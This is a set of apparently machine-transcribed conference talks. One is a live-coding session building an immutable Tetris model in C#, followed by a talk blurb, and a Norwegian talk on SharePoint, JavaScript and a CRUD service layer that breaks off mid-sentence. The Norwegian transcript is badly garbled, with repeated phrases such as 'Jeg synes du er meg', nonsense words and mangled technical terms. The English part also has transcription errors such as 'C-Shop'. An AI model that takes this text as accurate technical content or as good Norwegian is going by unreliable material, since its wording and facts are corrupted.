that for testing purposes, this is a pain. When I want to test board, I'm going to want to be able to construct it and not have to create a game. However, I'm going to immediately add in assembly info. Internals visible to tests. In fact, I thought there was a skeet flag that you're going to go, I'm John Skeet. Do not mess with me. Did you guys ever use a skeet flag when you're compiling a code? One important point, so one point of debate. When you write tests, what do you test? Everything. That's good. How? There is this mantra within some of the testing community. The testing community likes to argue, it feels to me, about what you test. Should you ever test this internals visible to? No, you should, but only be poking it through the public API. I'm doing an impression of myself now. I test general to specific if that is answering the question. Where I've got to personally is you need to test at different levels. There will be things that are difficult to test, edge cases that are hard to test by getting there through the public API. I have a method that is called through this long chain of calls, but I really want to test five different situations. I could work out the five different ways of getting there, or I could just give myself access in the tests, make them definitely white box tests and poke it that way. I personally think it's good to have a mixture of those tests. Those white box tests are brittle. That's what people always say, if you change the implementation, you'll need to change your white box tests, even if nothing in the public API is changing. It's like, yeah, I'm okay with that. Maybe at that point you write a black box test as well. I'm assuming you want to make some kind of change. It should be a publicly visible change, and maybe you write a test at that point that fails using black box testing, and then see that changing, see that passing when you've written the change to the internal method. Basically, I'm fine with giving internal access to tests. I try not to promote naturally private methods to become internal, just to have access for tests. Likewise, I don't like things that try to poke at the private methods using reflection, because that really does get brittle for you. I think there's a happy medium to be had. Well, as they say, it's not a problem until it's a problem, so you can fix it if you have to. Right, so we've got state, is gamestate.active. We need to have our board. A board just starts off being empty. So we can make tiles with height. In fact, we don't need these separate properties to be setable, because we can just do length, no. Array.getLength0. So for rectangular arrays in C-Shop, they are, as opposed to jagged arrays like this, so that's just an array of an array. This is a rectangular array, and there are various methods on the array class, which give you the length of each dimension. Now, I'm not entirely sure that I've got this zero and won the right way around, so at this point, I am actually going to write a test. Do you know what, I should add a reference. No, I do this all the time. Darn it. What are you doing? It's a checkbox. I always select it, because I think that's how you used to do it. No, I think in 2010 it changed, but in 2008, you would just select the rows, not bother with checkboxes, hit OK, and it would do the right thing. You notice I'm missing license terms at the top of all of this, and nice dot comments and stuff. I can't be bothered. This is not going to go on to any kind of source control, by the way, partly because I don't want Nintendo to see me. I'm hoping they'd be happy enough to demo some of the internals. I suspect this isn't what the actual code looks like. You could make millions. Skeetris. Skeetris, that's a good name. There are people, Roy Oshrove, if Roy's around, he may be about to hurt me. We need a reference to model up board. I'm going to create one with 50-20. I can do my best to end the impression. Seriously. I would do a Roy impression, but I don't have a guitar on me. There are two things potentially wrong with this test. We have repeated constants. Instead, we should create... Seriously? For a three-line or four-line test, does anyone actually think that this is much better? I'm happy enough repeating the constants. I have been told off in public talks before now for having more than one assertion in a test. I should have a height test and a width test. If I get one of them wrong, I can tell immediately what's wrong without having to actually look at the line number. Looking at the line number apparently takes hours and hours and hours. It's just a horrible, horrible experience. I got it right. As long as we know that it is width and then height, X and then Y will be fine. That's our ski test. There's no red-green refactor. It's just green, green, green, green, green, green, green, green. We did consider doing a version of this where we had a bottle of Scotch or something, and every time I got a build failure, I had to take a drink. I think that might have been more amusing for me than you guys. You would have me giggling insanely by the end of the night. I'm a real lightweight. Take me drinking. I'm really cheap. How many people are going to Twitter that right now? I'm going to come up with a little thing that's a preconditions class. I should really put this somewhere at some point. In fact, no, this can be internal. I like having preconditions. I like throwing exceptions where appropriate. I'm going to put one in to start with T, check not null. T string name, T value, where T is a reference type. Remember that in T-Shop, where T is a class doesn't mean where T is a class. It just means where T is a reference type. It could be an interface. I'm going to do if value is null, throw new argument null exception. I never remember the way around that parameter name and their message. Name, not in quotes. Joe, that's good enough. What message do you need for argument null exception? Possibly it was actually this value. But we know that the value was null. It's the only possible value. But if it's genuinely not null, then I'll return the value. That needs to be static. I'm not going to use that first, but that is my most common use. The other one I'll do is avoid method of check state. A message. I'll do if not condition, throw new variation exception, message. I'm going to use this immediately for pause. Preconditions.checkState. This is state in a general term. We'll have that on board and things, not game state. We happen to also be checking the game state. I should only be able to pause a running game. There is no point in pausing a game that's already finished and there is no point in pausing a game that's already paused. Can only pause an active game. An interesting alternative here would be to give it an expression tree instead. I'll put this in preconditions. I'm not suggesting you should actually do this. It's just an interesting idea. For the human beings out here, what are you doing? The problem is that I've got to write this message and I'm lazy. If I change this condition, I might not change the message. Whereas if I have an expression tree, I don't need a message because it's self-documenting code. I'm going to compile the expression tree and if it's wrong, I'll just... That's kind of crazy code, but it's valid. Expression trees. How many of you are familiar with expression trees? Oh, not actually that many. How many of you are familiar with delegates? Good, more. A delegate is something you can run. An expression tree is like a delegate in data form. You can go from this data form to an actual delegate and then execute it. Or you can examine it. It's a tree of things like... You start with a parameter expression and all kinds of things. This is how link works for a linked SQL. It takes this expression tree. You've written where ID equals... Where food.id equals ID and the compiler builds an expression tree. It's got this data representing the behavior you're interested in. It passes that to linked SQL that says, I know I'll turn that into a SQL of where id equals this, that or the other. But you don't have to be using linked SQL or whatever to use expression trees. They're handy just like this. Let's write a test. Let's make it deliberately fail. Game test. We'll see what it looks like. I'll make it not pass to start with. Can pause paused game. Game.startNew. It doesn't matter what the height is. I'm going to pause it twice. This will throw invalid operation exception. I'm hoping it will give me some form that is sufficiently readable that I don't need a different message. The answer is it passed. Do you know why? Because I'm immutable dummy. Game equals game.pause. I laughed because I was stupid here. I've designed this thing. How can I not use it properly? I can't think of a better name than pause here. But something I was talking about in my Notatime session yesterday is the difference when you're writing an immutable API. It should look a bit different. Let me show you some examples. I'm assuming that we don't really care very much how far we get in Tetris. We just want to dig into my brain and see whatever comes out. I've never understood the fascination. Really, I'm not that smart, but people seem to like it. Here we have some perfectly valid useful code because it creates a list of strings and it adds something. Don't use datetime.now. It's horrible. Ignore the fact that Resharp is already complaining at me. That code is bad code. Let's make it even more similar to the list version. What do we get to add? Timespan.fromDays1 These two look the same. This is wrong because the only thing that this can usefully do is see whether today is less than one day from the end of time as far as.NET is concerned, which is the year 9999. If it is, it will throw an exception. That's the only side effect it can have and we're not doing anything with the result. We really want something like datetime tomorrow equals. It's not obvious just from reading the code. If you've written this bad code, you might think it's okay because I call add to add something to a value. In no-time, it would be instant.now equals clock.now because it's testable. You would do now equals now.plus duration.fromMinutes1 or whatever. It's plus instead of add because if I write now.plus, that sounds wrong. It's good if ever when you're writing an API, you can make wrong code sound wrong. You're doing well. Unfortunately, pause is sort of, yeah. I'm not sure what else I would call it. However, let's make this fail and go back to the expression trees. There's no way on earth we're getting a working game. Any teams? I thought I wasn't passing the message yet. Sorry, I thought I had. Let's have one precondition rather than two. That was when we were actively specifying a message. Now, we get to see our code. Let me blow that up a bit by putting it into code. This is what the message is. It's not ideal, but it's not bad. There are times where you can auto-generate error messages. In this case, it would probably be fairly expensive. While I'm not a massive one for micro-optimization, generating a new expression tree all the time, I don't know how cashable that would be given that we're using immutability. It would have to be a different expression tree every time because it's got to have a reference to the current game so that it can check its state. Let's not go there. Let's have the message. We can immediately write unpause. Let's only be able to unpause. Because we knew it was active before, that's one of the nice things about saying you can't pause a dead game, you know that when you unpause, you've got to be going back to a live game. What else can we do with a game? What other actions are we going to have? End, win, lose. No, no, no. Connery. Connery? What? Right. Should we, sorry? New tile. New tile. I don't think so. Whose job is it to say that a new tile should be falling? Yours. The game. I'm trying to interact with the game and it shouldn't be my responsibility. I shouldn't be able to break it. Me saying win, think about, I want to write something that if this were to report scores somewhere, then a user shouldn't be able to cheat effectively. I'm not particularly talking about worrying about them actually doing this, but a good object model doesn't let you use it the wrong way. And saying I've won now is sort of cheating. Isn't that what you do on Stack Overflow? Speaking of which, I haven't checked it for like half an hour. No, you're not going to. Stay on target. No, we were going to check for it. He does this all the time. You have taken bribes from people. Right, so I think the things that we can do are have a tick. So, time passing. So, I don't know what we call this. I'll just call it tick for the moment to do think of a better name. Fortunately, we don't have any cache invalidation to do in this. Otherwise, we'd have both of the hard problems of computer science. So, someone was saying the only two difficult problems in computer science are cache invalidation and naming. And I think naming hurts all of us every single time. So, when we tick, we've got to have something to do. And currently, our board is always empty and we don't have any pieces. So, I think the first thing to do is address that. So, we don't even know what the game state is going to be. I can do nothing at the moment. No, I can do one thing. If state is paused, so time is still allowed to pass while we're paused. And we can just return. That's fine. Nothing's happened. Okay. And we can also do... That's a design decision. We could make it so that it just kept going. In fact, if we've got some really dumb external clock that's just going to keep giving ticks, maybe we won't say... Yeah. This allows the ticker to be as dumb as possible. Sorry, was that a question? No. Okay, cool. If you want to ask anything, do just shout. Okay? So, we now need the idea of a piece. So, I think we'll have a current piece. And now one annoying thing is I'm going to create a new game each time. Every time I add a bit of state up here, I've got to update all of these state transitions. That's going to get annoying really quickly. So, instead, I will do a clone method. I'm not implementing cloneable or anything. And so, this is the only place that I should need to look each time. And it's literally just going to do... state equals this.state, current piece equals this.current piece. Now, the annoying thing is I can no longer... I'm really now way outside the constructor. I can do return... I can do game clone equals clone. And then clone.state equals gamestate.posed.return clone. So, why are you doing the clone again? I kind of lost that. So, we are immutable, right? So, we need to create a new game. Oh, yes. On every time. So, we've already got a bunch of methods which are returning a new game. But if I need to set each field... Effectively, on each state transition, I want to only be able to write code that says, this is how it's different from before. Okay? So, there's an interesting way that we can get around this. So, this will work, but is a little bit ick. I really liked the fact that I could just set things. So, the only way that you can get object initializers to work is if you have a... a new expression. It's kind of annoying, but that's the way it is. What I could do is a little nested class. It's private because only I'm going to look at it. I definitely don't want anything else using this. And then I can write for each property that I have in the main game. I can write a new one here with setters. So, GameBuilder... It doesn't matter that this is public, but... So, this will take a game. And we can keep the clone. So, what I need to do now is have the... I'm stupid. Ignore everything I've just been saying because the sensible thing to do here is to create a constructor within game, which takes another game. What? Is that like inception? No. This is really fine. I'm stupid for not thinking of this before. So, this is the place to clone everything. So, this is the private constructor. So, this is our clone method, but rather than as a method, just as a constructor. And the great thing is I can then do... State... I can do what I'm about to show you. Okay. Right, so I can now do new game this. Except in this... It's getting like JavaScript right here, I just got to say. I mean, it's kind of wacky. In what way? I don't know these things. Well, it's just the concept of what is this and what you're playing with. Oh, no, we're not doing any cover capturing or anything in this case. It's relatively straightforward. If you say so. No, if you think it's not, let's get to the bottom of that. Equals... Oh! Do-do. Okay, we'll come back to that in a minute. But the pause bit, rather than do this game clone stuff, which what idiot thought of that, we'll do return new game this. State equals gamestate.posed. Okay, so now that you can see where I was trying to go, does it make sense? Oh, sure it does. I've just never seen this pattern before. I mean, never seen anything like it. Okay, has anyone else seen this kind of thing? Yeah? Any functional coders who can recommend something better within C-Shop? Okay. Someone up there? Oh, yeah. I could have a default parameter. I can have default parameters, but they won't copy it from... It would be lovely if you could say, if you don't pass any parameters, then pass this. But I've got nothing else... I want to be copying from the current game into a new one, and there's no way I can default to passing this, unfortunately. I think I see what you mean, but it wouldn't work. So, I think the suggestion was we could do something like game, and were you thinking of having parameters within the constructor? No? Sorry? The clone method. Oh, I see. Right. Ah, yeah. Okay, that would work. Okay, so we could do... Good one! New board. Yeah, this will work. State... Yeah, new state. No, it's game state. It calls null. And current piece, new piece, which sounds a bit funky, but it's fine. Right. And then current pience. Right, so now we can... Oh, yeah. So, we can't do that for game state, because there has to be some... We have to specify a default parameter. What we could do is a nullable game state. That's okay. And current piece, why doesn't it like that? Thank you. Okay, so it still doesn't like that. We haven't come up with a piece type yet. Fine. So now we can do returning new game at this.board... Sorry, where the board is new board, this.board. State is new state. This.state, game state, no state. And current piece is new piece. This.currentpiece. Okay, and now we can do... Let's call it change state. Or with state. That's nice. So with is quite a good... If you're thinking about methods that mutate stuff, or look like they mutate stuff, but actually return a new one, I like with state, or you're with foo, with bar. So let's get rid of the crazy stuff here. Having one or the other would be fine. Just to say, my previous plan would have been... Would have worked. But we can do with state, or this.stopwithstate, irrelevant which, and then use a named argument of new state, gamestate.posed. That reads pretty good. I like that. It's not bad. And then we can do the same thing. There. Right, so we've got the idea of starting new, and we've come to the idea of we need a current piece, because something's got to happen when we tick. So a piece will have a position, which there may well be an appropriate position struct somewhere. We only need it to be integers. I suspect that most position E kind of structs are double related. And also, I tend to think that most position like structs are going to be either within system.windows.forms or system.presentation, windows.foundation, whatever it is. And we want to be able to do this for the console app. So it should really be completely UI neutral. So we could write a little position struct. I'm just not going to bother, because it's not worth it. And we have 12 minutes. So the other thing that a piece has is an orientation. And let's just hold the horses on that. We might be tempted to write a setter and a getter for the orientation. I don't think it's worth that, because what does the rest of the world want to know about a piece? They want to know. It's tile state. This is slightly irritating. John, why is a piece more mutable? It will be. Yeah, these are private setters. And obviously, I would make everything sealed. So this is definitely going to be... Well, if you're going to have immutable types, you really, really want to seal them. Leaving the whole argument about whether you want to leave everything up to everyone else to decide whether or not they want to extend, or whether you want to lock everything down. You want to lock everything down. But leaving that perfectly valid discussion for another time. If you're going to say this type is immutable, then other people should be able to receive an object that is compatible with that type. So I want to be able to receive a piece and know that it's safe for me to keep a copy of that reference, and it's not going to change. Not just it's not going to change in ways that I care about, because I only know about piece, but I really don't want to have any other changes of some subtype, even if I don't care about it. I may be passing this to someone else who says, oh, well, if it's this kind of piece, I will note something. And then they've got an old copy of my now mutated piece. It just goes horribly wrong. Immutability should be absolute. An object is either immutable or it's not. So system.object is not immutable because it doesn't stop me from writing immutable subtypes. So I'm going to call tile state. I'm going to hate this. So we want something. This tile state concept is a useful one. It represents the type of a tile. I've got it. OK, let's revisit a decision. We said before, wow, you should have picked me up. Why didn't you pick me up? I was trying. You were just on a roll. We said before that a space on the board is either one of this some kind of tile type, which we're giving colors, but we don't need to, or it's empty. That's the perfect place to use an nullable type. So all we need to do is change our board. So it doesn't have. You're excited about this. I am. It's good. So unfortunately, the default value for a nullable value type is still the it doesn't have a value. So now I'm fine other than the fact that this is named incorrectly. So it's a tile type rather than a piece type, but a piece is formed of tiles all of the same type. Make sense? So in our game, no, in our piece, it's entirely reasonable to have something like this. And okay, so it's going to have a type and I think having said I don't want positions, I really do want a position. So this is unfortunately going to clash with other things. I've had various internal types and they should all be public to be honest. Right. So having said I'm not going to do anonymous, I would just do automatically implemented properties. I kind of refuse to do it for structs. I really, really, really want the fields of a structure be read only. If we ever felt we wanted to use a board that is too long for int or maybe has fractional positions, we could make position generic. I'm really, really stressing that we don't go there. So okay, we now have a position. And I don't think pieces need to know the orientation or other a piece needs to know its own orientation, but no one else does. All we need to do is be able to guess at the positions. What is resharper complaining about there? It must be more. Oh yeah, because these should be public. So it's saying you can't. It was already private and you can't specify you've got a private setter on an already private property. Nor can you do make this internal and then give a more public part that will die in the same way. Right. So we don't even need, wow, there's so much that we don't need. So the piece needs to know some anchor position and we need to be able to know the type because ultimately we're going to want to draw this. Okay. What do you need to know to draw a tile? You need to know the type, so the color that you're going to draw and the positions to draw. That's all you need to know. So that's all I'm going to tell you. Okay. And I'm going to implement that another time. But the operations on this. If anyone can think of a better name again than rotate, so rotate sounds like we're mutating it. It's almost after clockwise rotation. Mutation rotation. Yeah. With rotation. So with a new bit of state, a new property makes sense, but with an action doesn't quite work for me. As clockwise. No, I don't. Rotate it. Sorry, did you say rotated? Yes, that's exactly right. Yes. Good man. Yeah. So look at how this is going to read elsewhere. So we're going to write. What can I just jump in? Yeah. You have five minutes left and I was thinking that people might want to ask questions. Yeah. If you don't want to ask questions and you want to keep watching them code, that's fine. But I was thinking that there might be some questions unless. So it's dead as mine. Let's just write this one thing, rotate piece right. And okay, we'll probably want to change the name of this afterwards as well. So when the user tries to rotate a piece right, it doesn't try to. It doesn't try to get at the piece and rotate that it says to the game, you know, the next thing I want you to do is rotate right and we'll say, um, bar rotated equals current piece.Rotated right. Rotated clockwise. Oh, I like it. And then we'll see, um, you know, if, uh, board dot, um, uh, collides, collides with the game, rotate it, return this. Okay. Obviously we would, you know, write the methods and stuff. Otherwise, uh, we'll, um, return, um, new, uh, no, we'll return our with state. Um, new piece is rotated. I think there might be something in this functional lock. It's, it's quite, quite sweet. So all that changes when we rotate a piece clockwise is we've got a new board with exactly the same state except the rotated piece clockwise after we've tried to rotate it. And if rotating it doesn't do anything, then we just return the same reference because no state has changed. We might also want, and this is where I don't know how the functional stuff hangs together. We might also want an event of you failed to do something so that we can go at the user if they try to rotate it and it would collide. Um, I'm not sure. Um, okay. Uh, you were asking for questions. Any questions we have three and a half minutes? Yeah. Yeah. So you're, uh, you're doing all the state stuff. What will happen, how will you implement the case where the user tries to rotate the piece? That's exactly the same input that it takes. Right. That's a great question. The question was how will we cope with a user tries to rotate at exactly the same time as it ticks? And this is something that, frankly, I'm disappointed Rob didn't bring up. Um, of how we should be. Um, your code is bad and you should feel that. Um, that's every answer you ever gave me on Stack Overflow. Um, so how we manage the ticking, uh, should determine this. So, um, there are different possibilities for this. Uh, one is that we put all the ticking on the UI thread. So we just put a dispatcher timer in the WPF version and we say, you know, either it ticks or we get a button pressed, but only one of those is going to happen at the same time. Um, or we have some sort of shaperoning thing. So, so we make sure that actually we don't call, it's safe to call both actions on the same board, but only one of them is going to get through to the UI. Um, because the board doesn't have any idea of current. Every board is current for its own, in its own happy little world. Um, it is current and all it can say is, well, if this happened, this is what the world would look like afterwards. So you do need to make sure that those happen in some kind of order. Um, so you could have a queue of how things are happening, but you want to make sure that no two actions happen to the same board. Um, or other, well, in fact, we will have things happening to the same board. So if the user tries to rotate right and then it ticks, um, then we'll have returned this. So it's not like we want to put something on saying, oh, I remember that something's happened to me, therefore nothing else should happen to me. Because one of the nice things about immutability is if you don't need to change state, you can just reshare the same reference. Um, so there are, there are interesting ways of doing that. Basically, it would require locking of some description or some kind of synchronization, some coordination to make sure that things don't happen actually at the same time. Um, or some protection that said, well, I will detect if things have happened at the same time and throw away one of those results and it sort of doesn't matter. But I then need to reapply the action on top of the later one. So, um, imagine that you had transactions in a database so long as you can notice if they collide, it's okay. And in fact, imagine that you had, uh, rotate right that doesn't work and a, and a something else that doesn't work. Um, it's, it doesn't matter, something else that doesn't change the state. It doesn't matter if those both happen at the same time because the result is still going to be exactly the same afterwards. Um, I would say the same is true for tick, but it may be valid after the tick, but not before or vice versa. So the ordering definitely matters and, um, I'm not trying to make game itself understand threads. Okay. One thing I would say is even with immutability makes life so much easier in terms of threading, but you really want to limit how many classes in your system have any concept of threads. Um, so don't try to, I used to do this. Um, when I, back when I was, if we lad writing Java code, um, sort of in, in my early twenties, I had learned that if I didn't do any synchronization, things would fail. Okay. So I think there are like four or five stages of awareness of threading. There's, I do nothing. I just merrily go and everyone can mutate everything. I'll start new threads. Everything can modify everything. Fail. You then say, I know how to deal with this. It's the synchronized keyword. I will sneeze the synchronized keyword all over my code base. Every method will be synchronized. What could possibly go wrong? Everything could possibly go wrong. So instead of having it go, ah, I'm, I'm all a mess now. I've got race conditions all over the place. I've got inconsistent things. Instead, your app goes, because you get deadlocks because you haven't thought about it. You then get to my current state, which is, do you know what? This threading stuff's hard. We need to think about it and limit, the more places I have to think about threading, the worse life is going to be. So what I want to do is have a tightly controlled set of bits that need to care, and the rest of the world should just assume that it's being used sensibly by a single thread. So that's why StringBuilder in Java 6 or whenever it was introduced made sense. Previously, StringBuffer was this, I know I shall have StringBuffer that is thread safe, because people are always appending to StringBuffers in multiple threads. That happens all the time, right? Almost never. You don't need to use this sort of thing. So very few classes need to be thread aware, and if you rigidly control it, then it's much easier to reason about things. Yeah. We have to go. We have to go. Okay. Rob needs to buy me drinks. So, well, we haven't even got an application to run, let alone one that builds, let alone anything. Success. Yeah. Ship it. I should say, the code that I wrote while I was out of text, at the end of an hour, I had a console app that did actually work, and during that time, I was consulted on about a different bug in an important system. So it can be done, but usually not while discussing design decisions at the same time. I hope you found that useful. I have no idea. But come and ask me any questions later on. Feel free. I'm not going to go any further with this, probably. But it's kind of an interesting Carter or exercise. Carter is normally a bit smaller, but it's an interesting exercise. So go have fun. Do it. And I think if you can write a model that you can then put a console view and a WPF view, then probably you can also put a Windows Store app view and maybe a mobile view and stuff. So, yeah, hope you enjoyed it. Thanks very much. Thank you. Nicely done. That was good. No, we had nothing.
|
Tekpub has a video production series called "Full Throttle!" where experienced developers are put to the test and recorded. The interactions are not scripted, and everything is recorded as it happens. In this talk, Rob Conery (from Tekpub) will put Jon Skeet in the hot seat and make him solve an interesting problem (which he, and you, will only find out at the time). Along the way Rob will toss in a few "curve balls" (last minute changes in requirements) to see how well Skeet can adapt...
|
10.5446/51454 (DOI)
|
Hva synes du? Hva synes du? Jeg er sikker. Ok, så starten. Jeg er fra Kamptas. Jeg heter Jørna Hatelig. Og min computer har bare krasht. Eller noe. Så, jeg er fra Kamptas. Min namen er Jørna Hatelig. Og min computer har bare krasht. Eller noe. Det er ikke cool. Så, ja, det er meg. Jeg synes du er meg. Jeg synes du er meg. Jeg synes du er meg. Jeg synes du er meg. Jeg synes du er meg. Jeg synes du er meg. Jeg synes du er meg. Jeg synes du er meg. Jeg synes du er meg. Jeg tror jeg har tatt på dette side. Så jeg kan se hva jeg er gjennom. Min nam er Jørna Hatelig. Jeg arbeider i Kamptas. Jeg er en senior knowledge engineer. Jeg er også leder av webapplikasjoner professional network. Det betyr at jeg er veldig interessert i JavaScript, HTML, CSS3 og så. Det er veldig kult. Min bakgrunn er på sin løfthavns side. De er de company jeg har vært for. For en halv år før jeg begynte i Kamptas, jeg har arbeidt med web, mobil web og kompressing. Webseit til mobil webseit. Jeg har også begynt med algoritmer, databases, weboptimalisering. Men mye på linje side. MySQL, PHP og LAMSTAC. Så når jeg begynte i Kamptas, jeg nødde å finne noe som var meg som ikke var de ting som var. Det endte å være HTML, web og JavaScript, som jeg har vært for en lang tid. Jeg føler at, noe jeg har 20 års experience med web, jeg begynte med min første webseit 20 års tid. Jeg føler at jeg blir mer experience hver dag, men for en experience point, again, 20 nubi points. Hver gang jeg begynner å begynne i web, er det så mange nye framworker og sånt. Det jeg skal ta til deg i dag er enterprise hipster applications. Med sharepoint og JavaScript. Bjørn Einar, han tog det litt i denne likningsdagen. Han er klunnen og vi gjør hipster stoff, men selvfølgelig, vi er ikke hipsters. Denne enterprise part er ikke det vi tenker om. Det er en USS enterprise fra Star Trek, men vår enterprise er mer som dette. Vi arbeider for året, og vi gjør kollaborasjoner. Når vi kommer til kollaborasjoner, og alle industries, det er mye om sekuritet. Og uten der, de er utenforstående, de vil bare kjøpe dokumentasjoner. Det er noe som går for å være bra. Vi må ha dokumentat hva alle har gjort og hva som har vært satt, og hvem som har gjort beslut, og hvem som ikke har vært satt, men vi må høyre resultat eller failere og se hva vi kan gjøre bedre. Microsoft har en slags solusjon for dette, og det er Kors SharePoint. Når jeg startet i kompetas, SharePoint 2010 var det. Det var det vi var på. Det er utenforstående, og alle er veldig happy om det. Når de starter å finne ut, de må nøyre noe mer, og noen som har kastemiseringer. I vårt kastet er det møte. Vi taler om møte og hva som sker i møte, og hva som har vært satt, og så kan vi bruke det nøyre. Det er tals, beslutninger, dokument og alt. SharePoint har dette utenforstående, og det er fantastisk. Vi har dette møte og etterpå. Det er det som ser ut. Når du starter å bruke dette, siden vi har alle de ting du nøyre, du har det i det, du har beslutninger og dokument, du har en agenda, og du har tals. De vil være followed og du kan gjøre arbeidstekst på dem, og alt er fint, men det er en sort av en mess. Og å kreere tals i SharePoint er sånt. Imagine at du sitter i et møte, og du vil få noe. Noen decide at du skal oppnå tals til noe. Du har alle dette data, og du har dette stort form, det er mange botten. Og mellom hver botten du klikker, det er et nytt pag, det er en reload, og det tar mange tid. Og på en time du har endret å putte i talsen, du ser at, et tals er over. Jeg var prosent av SharePoint, jeg vet ikke alle det, og det var så mange botten. Jeg vet ikke hva å gjøre, og jeg fikk ut at jeg må kombine dette med min størrelse, fordi hvis du putter på en stor tals form, og du har ingen idé hver du starter, og du har en størrelse, og det er litt saksig, så du har blant i en slags saksig, og du håper å få ut en reaktion. Du vil få ut en skjøl, og ut av boxsharepoint må ikke gjøre det. Så det var startet, at på en time jeg startet, jeg var introdukt til Arctic SharePoint Challenge. Og dette er som en hackathon på sharepoint. Det ser ut som kontrojektiv, men det er veldig fint. Det er tre dagar, du går ut farvel, så ingen kan se deg. Og det der er at du må øne døren, du øner vittekoins, og øne respekt for det som du gjør. Respekt er ikke så kjent at du har gjort denne størrelsen. Det er også døren, men du har også døren for mest utløs. Det er det mest funnende, ikke? Så en av de solusene som vi hacket opp her, jeg var fikkert, ok, min rank, jQuery, og alle de javaskrape, vi hacket inn, og vi startet å bygge noe. Så når du vil høyre noe til et eller annet møte, så bruker du ikke dragendropstil. Jeg har ikke det, automatisk sørt i kontentdatabasjoner i sharepoint. Og... min video er ikke spørselig. Eller er det? Nei. Skippes litt. Så vi vil ha... ha de sørtutlene vi er useder til fra jQuery. Og ja, hei, dragendrop. Nå er personen som er velgjort til et møte, og han har satt et sørt, ikke? For det er en av de viktigste tingene til et møte, som vi vet om i et møte, så vi vet at du ikke sier på noe andre enda sørt. Og... Vi fastforer litt her. Vi kan også se at... den veldig utsynlig feitere av tekster her, å flytte rundt når han har satt sørt på den andre side. Det er fantastisk, ikke? Og så er entenprensler det. Så... Nå har vi dette møteapplikasjon, og vi er tatt til å få en bit mer... utsynlig. Så vi har... en liten bit av JavaScript her. Vi kan sekt et topp, og skrive noe, og se hva det er. Gå en liten sørt og inn. Og vi har en step forbund. Det går litt snart, og vi taler om sharepoint, med sharepoint-servis. Så alle kan skjønne, og vi har en masse list og ting på denne side. Det er hva sharepoints kommer med. Og vi tenker på, at vi må være i nøy av en liten arkitektur. Jeg er en arkitekturkansker. Jeg vil lide ting. Og ha noe start med en singel startning. Fordi... jækvari er like, dokumenter, kødder, gjør dette, og gjør det. Og du har ikke noe klart hva det er først, og hva det er først, og hva det er først, og hva det er først, og hva det er først. Så... Ja. Så dette er det vi endret opp med. Så dette er... i de letter, du kan probably finne en MVVM noe. Og i bøtten har vi en servicelære. Og... Vi har en T, som står for templaten, eller testet, hvis du vil. Men vi har det. Og det er fantastisk. Jeg vil spille noe om hva. Men, litt til å lide, vi har vært møkjering med dette, og dette er hva et møkjering applerasjon ser ut som. I et sted, hvor... hvor vi kan bruke noen sommer studenter, ikke? Så jeg har vært møkjering med dette. Jeg har vært krevet litt av arkitektur og kod. Og vi har en slags oppvendt og runnende. Det er ikke køk, men vi har noen spises. Og det er tid til sommer studenter. Sommer, og vi har studenter. Så vi har 4 folk som kommer inn. Og de har ingen skjædspunkt. Hvor mange er skjædspunkt? Nå er det mange. Vi må finne en måte at disse kan møke noen applerasjoner, men ikke skjædspunkt. Det er en insensiv. Så, det vi proposer er en utgjendelig kravservisker i JavaScript. Racer Han, hver som vet hva det er. Ja, to folk. Det er de som har kollegjerne. Jeg har vært med dem. Så det er en utgjendelig kravservisker. Det er noe vi kan skjædspunkt. Og det er en småkastning. Det ser litt grønne ut, men det er fordi det er lagt ut. Og Krod, du har de 4 operasjoner. 4 utgjendelser som er viktig. Det er kvart, kvart, oppdater og løt. Og vi kaller det servisker, fordi det er det som er vår service buss til serven. Og i vår kastet kan vi ha en kravservisker i bøtten. Så vi skriver en av de skrivene for kravservisker. Og vi skriver en node. Hei! Så vi skriver en for node. Når vi har de 4 kommandene, som er sort av simpel, kan vi også skrive mock. Så for testen og unitesten kan vi use mock service, som ikke løy på serven. Så vi har de stoffene, og vi kan sørge skravsvist for nå. Og starte å bygge en skrift på top av det. Så dette er eksempel av skravsvist. Det viktigste for oss her er at vi har en mapping. Fordi at de som vi har på skravsvist, som vi får fra SPJS, de er nøy til å bygge noe. Og i vår app, de er nøy til å bygge noe andre. Fordi vi vil ha det å bygge på en masse servisker, og så er det en annen bakkjend. Så vi har en mapping. Vi må sørge en av dem. Det er løy i dag, så jeg ikke skal si alle kodene. Så vi løyter. Og vi må ha en begynning av etterne. Og dette er kodet vi har for å gjøre det. Og det er til å snakke på skravsvist. Det er ingen j-kvare på dette, men det er ingen j-kvare, hvis du har en annen bakkjend. Vi har å få etterne. Det er viktig for å få en liste av etterne. Våret i møteapplikket er møte, så vi vet at vi ikke får noen av etterne. Skravsvist gir deg kontekten, så vi vet hva vi møter i regn. Vi vet hva vi er og sånt. Vi må ikke være med om det. Vi må bare få alle etterne. Og du kan bare si hva en av etterne som det er. Og give deg en kvare. Så det kommer til deg når det er klar. Og etterne som det er, for eksempel, jeg vil alle etterne. Eller jeg vil en agenda. Og det kommer til deg når det er klar. Og så har vi to funksjoner. Det mapper til og fra en skjøpjøyning. Vi bruker mappene som vi har. Og bare foregå det og mappe det over. Og vi ender med en objekt. Det er en generisk objekt. Vi bruker en inheritans, så vi kan inherites fra en generisk objekt og tilgjøres til det. Og dette er det vi starter med noll. Så jeg synes at de som har vært til jobbskripssessjoner her i NDC, har vært tilbake til noll, hvis de ikke har sett det før. Og det gøyeste er at du skriver valget med noll og vi propagerer til ur-UI. Og dette er det vi bruker her, fordi vi kan ha staten i objekt, siden det er søvning eller død, og det betyr at det er søvning og vi kan alle ha det i noen lærere. Jeg vil tilbake til det også. Så vi har alle disse objekter. Og i en skjøpjøyning er det noen liste. I en database kan du ha det på et sted. Jeg vet at i Backbone er det noen model, eller næmningen skjer litt, men vi har kallet det en model i vår eksempel, og intenten av modelet er å keep en liste av objekter. Og en liste av objekter har også en komputer på det som sier at hvis en objekter er avsett, det betyr at denne modelen er avsett. Vi har et sted, en av de andre modelen er avsett. Vi kan også injektes med en service, som sier hvilken service vi er brunnen med. Vi kan innfølge det i mokken, eller på skjøpjøyning, eller nød, som en bakkjend. En av de mest viktigste feitene av denne modelen er at vi har en oppdatering. Og oppdateringens mænne fokus er å rettere noe fra serveret og blende det med det vi har på klienten. Vi har gjort det sånn, fordi vi ikke løyder på noen andre av de andre, sier at vi har det. Det er fordi vi er en enterprise, så hvis vi bruker en push server, og gi oss objekter, denne push server er fra de andre. Så når vi bruker push services, push services er det enn vi er i, er at denne listet er nød til å oppdater. Og så kan vi bare køle oppdatering og få noe som er nød. I dette case har vi en task model, og dette er en instans, eller faktisk, det er ikke en instans, men det er en inherited form av denne modelen. Så vi kan løyde de veldig kodene hver enn de singel modelene vi vil til en minimum. Det er hvor vi også inkommer serviceen, og 